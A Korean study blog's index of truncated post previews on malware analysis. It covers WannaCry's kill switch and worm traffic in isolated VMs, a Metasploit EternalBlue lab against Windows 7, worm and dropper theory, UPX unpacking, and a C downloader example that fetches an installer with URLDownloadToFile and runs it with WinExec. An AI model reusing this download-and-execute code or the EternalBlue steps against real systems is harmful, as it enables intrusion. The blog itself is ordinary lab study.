지은이는 지은이

워너크립토를 실행하고 SysAnalyzer로 분석을 해보자 레지스트리 모니터로 들어가면 실행파일을 확인 할 수 있다. 일단 워너크립토의 전체적인 암호화 분석 보다는 드로핑된 파일과 서비스된 파일 중에 네트워크를 담당하는 부분이 있는데 그 웜 부분만 분석을 해보장 아이다로 a.exe(랜섬웨어 실행파일)을 분석해봅쉬당 메인 함수에 킬스위치라는 부분이 나옴! 이렇게 생김 킬 스위치란? 랜섬웨어가 실행될때 저 인터넷 주소에 접속이 된다면 랜섬웨어가 실행을 안하고 종료됨. 가상기기를 우회하기 위해 넣었다는 의견도 있다.(https://www.boannews.com/media/view.asp?idx=54809) 저기서 접속이 잘 되면 인터넷 오픈을 한다 원래는 InternetOpenUrl 이라는 api를 쓴다! 이..

웜의 동작을 리버싱해보자! 윈도우 환경을 두개를 깔아줍니다. 이때 네트워크 설정은 'host only network'로 해서 외부 인터넷과 차단되게 설정해줍니다. (이때 ip가 각각 달라야함!!) 왜냐면 외부와 연결이 되면 그 연결이 끊겨버리는, 더 이상 악성코드가 동작하지 않는 환경이 됨!! 6b~ 로 시작하는 악성코드를 압축 해제하고 a.exe로 저장해준다 이때 이 실행파일을 SysAnalyzer에 넣고 분석하면 됨. 근데,,, 원래 얘가 부팅을 리부트를 할때 감염을 시켜서 SysAnalyzer에 넣고 분석을 하려고 해도 잘 안 보임 -> 그래서 와이어샤크로 분석해보자!! 우선 두 pc 모두 네트워크를 홈네트워크로 바꿔주자 와이어샤크 실행시키고 캡쳐하기~ 갑자기 이런 에러가 떴지만.. 일단 프로그램 ..

칼리 리눅스 가상환경을 만들어주고, msfconsole을 켜준다! (윈도우7도 가상환경 만들어주고 둘다 NAT network로 설정해서 ip 주소 다르게) 이터널블루를 검색해보자 이터널블루란? 이터널블루는 취약점 분석 도구이며, 워너크라이 랜섬웨어 공격에 일부로 사용되었다. 이터널블루는 마이크로소프트의 서버메세지블록(SMB) 프로토콜 구현의 취약점을 공격한다. 5개의 모듈이 보이는데, 이중에서 0번 모듈을 선택해서 사용하자! (use 명령어 사용) 이 다음, show options를 입력해서 공격할 곳에 대한 정보를 얻자 Required 에 Yes라고 되어있으면 반드시 필요한 부분, no는 필요 없는 부분 근데 지금 보면 yes라고 되어있는데 옆에 Current Setting에 비어있는 부분이 보임!! ..

https://www.techworm.net/2022/01/download-windows-7-iso-ultimate-professional-edition.html#google_vignette Download Windows 7 ISO File -Ultimate/ Professional (32/64 Bit) [2024] Windows 7 was released over a decade ago which was able to repair the damage of reputation and credibility done by the Vista debacle. Do you want to www.techworm.net

맥북에서 버추얼박스로 윈도우 여는데 자꾸 렉이 엄청나게 걸려서... 내 기록용으로 ㅜ 버추얼박스로 윈도우 렉걸리때 해결방법 / 버추얼박스 윈도우 화면 자동 맞춤 요거 눌러주고 좀 기다려주면 윈도우에서 일케 듬!! 저 버박 게스트 에디션 클릭해준다 요거 실행시킨다 항상 보면 저 설치 창이 파일 창보다 뒤에 떠서 밑에 상태바에서 클릭해서 위로 올라오게 한다 글고 그냥 다 ok 눌러서 설치 이제 리부트만 해주면!!!!!!! 오예~!~! 화면이 자동적으로 사이즈 맞춰지고 렉도 안걸리고~! 굳굳 [참고] https://www.youtube.com/watch?v=g6Lb7WMpV1M

웜 스스로 복제하는 컴퓨터 프로그램, 독자적으로 실행 1999년 이메일 주소를 수집하고 스스로 전달되는 형태로 인터넷 웜이 출현하며 용어가 알려짐 네트워크를 통해 자신의 복사본을 전송 네트워크를 손상 시키고 대역폭을 잠식 -> 통신 마비 웜 확산 방지 취약한 네트워크 통신 프로토콜을 사용하지 않음 방화벽에서 알려진 취약한 네트워크 프로토콜을 차단 취약한 어플리케이션 버전 패치 기본 공유 폴더 해제 윈도우 계정 패스워드 설정 기업, 개인의 보안 의식 강화 웜 확산 단계 웜의 유형 Mass Mailer 형 시스템 공격형 네트워크 공격형 대량의 메일 발송을 통해 확산 운영체제 고유의 취약점을 활용 -> 내부 정보 파괴, 시스템 파괴 특정 네트워크, 시스템에 대해 Dos 공격 수행 TCP 135/445 트래픽 ..

트로이 목마 (드로퍼) 겉보기에는 정상적인 프로그램으로 보이지만 실행하면 악성코드를 실행 보통 사회공학기법으로 퍼짐 동작 방식 오리지널 프로그램이 있다면 이 오리지널 프로그램 내부에 멀웨어가 담겨져 있음 오리지널 프로그램을 실행한다고 해서 멀웨어가 실행되지는 않고, 멀웨어를 extract 해야함 멀웨어가 밖으로 나오게 되면 오리지널 프로그램에서 Create Process 와 같은 api를 통해서 실행됨 결과적으로는 두개의 프로그램이 동시에 실행되는것!! (두개의 프로세스) 주요 API GetTempPath: 임시 파일로 지정된 디렉토리의 경로를 검색합니다. FindResource: 지정된 모듈에서 지정된 유형 및 이름을 사용하여 자원의 위치를 결정합니다. SizeofResource: 지정된 자원의 크기 ..

Downloader이란? 주요 API URLDownloadToFile: 인터넷에서 비트를 다운로드하여 파일에 저장한다. WinExec: 지정된 응용 프로그램을 실행한다. 동작 방식 실습 프로젝트 파일을 열면 다음과 같이 코드가 나온다 #include #pragma comment(lib, "urlmon.lib") int main() { LoadLibrary(L"urlmon.dll"); HRESULT hResult = URLDownloadToFile(0, L"http://app.pc.kakao.com/talk/win32/KakaoTalk_Setup.exe", L"c:\\Program Files\\a.exe", 0,0); WinExec("c:\\Program Files\\a.exe", SW_SHOW); ret..

MsgBox_upx.exe 를 올리디버거로 실행해보자 맨 처음에 PUSHAD 라는게 보일텐데, 얘는 레지스터 A~D(EAX부터 EDI까지) 까지 다 스택에 push 하라는 거다 이걸 왜 하냐? 레지스터에 있는 값을 보관하기 위해 함. 왜 보관을 하냐? 패커는 종종 이렇게 레지스터의 값 임의로 저장을 해두고 나중에 다시 복원해서 씀! 그럼 PUSHAD 가 있으면 그 반대는 POPAD이다!! ctrl+S 로 popad를 찾아보면 다음과 같이 나옴 upx에는 popad가 하나가 아닐 수 있기 때문에 일단 F2를 눌러 bp를 설정하고 ctrl+L을 눌러 다음 popad를 찾는다 여기에도 마찬가지로 bp를 걸어준다 여기서 한번 더 ctrl+L을 눌러주면 밑에 Item Not Found 라고 오류메세지가 뜬다!! ..

MessageBoxW라는 함수 하나만 들어가 있고 실행하면 다음과 같은 화면이 나온다. 실행을 하면 Release에 이렇게 exe 실행파일이 생성된 걸 볼 수 있는데 여기서 upx 패킹/언패킹을 한번 해보자!! (지금 저 경로 안에 upx.exe가 이미 있음. upx가 다른 경로에 있을 경우 환경변수 설정이 필요함!!) 윈도우7 폴더에서 cmd창 바로 여는 꿀팁... 그냥 우클릭하면 안되고 shift+우클릭을 해야 "Open command window here" 이라고 뜬다!!! 난 맥북 써서 몰랐다..... 여기서 이제 upx를 쳐보면 이렇게 뜨는데 압축을 하고 싶으면 upx MsgBox.exe -o MsgBox_upx.exe 라고 하면 바로 압축되는걸 볼 수 있다! (아까 실습파일에 이미 있어서 지우..